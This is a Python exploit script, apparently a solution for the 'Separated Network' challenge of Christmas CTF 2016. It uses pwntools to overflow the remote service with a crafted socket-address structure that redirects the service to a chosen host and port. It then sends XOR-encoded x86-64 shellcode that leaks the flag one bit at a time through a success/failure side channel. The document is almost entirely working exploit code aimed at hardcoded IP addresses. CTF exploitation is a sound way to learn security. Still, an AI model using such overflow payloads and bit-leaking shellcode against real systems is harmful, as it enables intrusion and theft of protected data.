Christmas CTF 2016 Separated Network

separatednetwork.py

from pwn import *
from socket import AF_INET

import itertools

context.arch = 'x86_64'

def encrypt(x):
	s = ''
	key = [1, 2, 2, 1, 1, 1, 2, 2, 1, 1, 1, 2, 2, 1, 1]
	for c, k in zip(x, itertools.cycle(key)):
		s += chr(ord(c) ^ k)
	return s

host = '45.55.68.215'
port = 30303
host = '192.168.226.132'
port = 12345
flag = bytearray('\x00' * 13)
print encrypt('SHELLCODER')
for index in range(13):
	for bit in range(8):
		r = remote('220.126.183.99', 32123)
		code = '''
mov al, byte ptr [0x601050+%d]
mov bl, %d
dec bl
and al, bl
jnz true
false:
mov eax, 0x400653
jmp rax
true:
mov eax, 0x400636
jmp rax
		''' % (index, (1 << bit) + 1)
		shellcode = asm(code)
		payload = "SHELLCODER" + ''.ljust(10) + shellcode

		inet_addr = lambda x: sum(int(x.split('.')[i])*(1<<8*(3-i)) for i in range(4))
		obj = 'A' * 32 + p16(AF_INET) + p16(port, endian='big') + p32(inet_addr(host), endian='big') + 'a'
		r.recvline()
		r.send(obj)
		r.sendline('2')
		r.recvuntil('Messages are encrypted and Delivered.\n')
		r.sendline(encrypt(payload))
		data = r.recvall()
		print `data`, index, 1 << bit
		if data == 'Message Sent successfully.':
			flag[index] |= 1 << bit
	print `flag`

flag = str(flag)
print flag